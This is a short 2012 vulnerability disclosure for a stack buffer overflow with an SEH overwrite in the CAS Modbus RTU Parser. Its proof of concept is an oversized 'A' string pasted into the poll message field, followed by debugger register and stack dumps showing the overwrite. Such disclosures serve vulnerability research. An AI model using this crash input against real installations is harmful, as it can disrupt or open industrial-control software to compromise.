Title : CAS Modbus RTU Parser Buffer Overflow SEH
Author : Senator of Pirates
Founder : Marshall Webb
Link Software :
http://www.chipkin.com/technical-resources/cas-modbus-rtu-parser/
FaceBook : /SenatorofPiratesInfo
Marshall's FaceBook : /lulznet
Date : 2012-09-07
Greets : USA & Morocco
PoC :
----
you should input a long string of A*40000 into poll message and
presson Analyze then SEH pointer is overwritten with 0x61616161 as you
can see below.
eax=00007531 ebx=00000000 ecx=0000099a edx=0012b138 esi=00f94f1c edi=00130000
eip=00408f79 esp=0012b118 ebp=0012f840 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
image00400000+0x8f79:
00408f79 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]
0:000> dd esp
0012b118 0012fed4 0012fe08 0012f840 00000004
0012b128 5d5b0a0d 3a2c0920 7b29282e 003e3c7d
0012b138 61616161 61616161 61616161 61616161
0012b148 61616161 61616161 61616161 61616161
0012b158 61616161 61616161 61616161 61616161
0012b168 61616161 61616161 61616161 61616161
0012b178 61616161 61616161 61616161 61616161
0012b188 61616161 61616161 61616161 61616161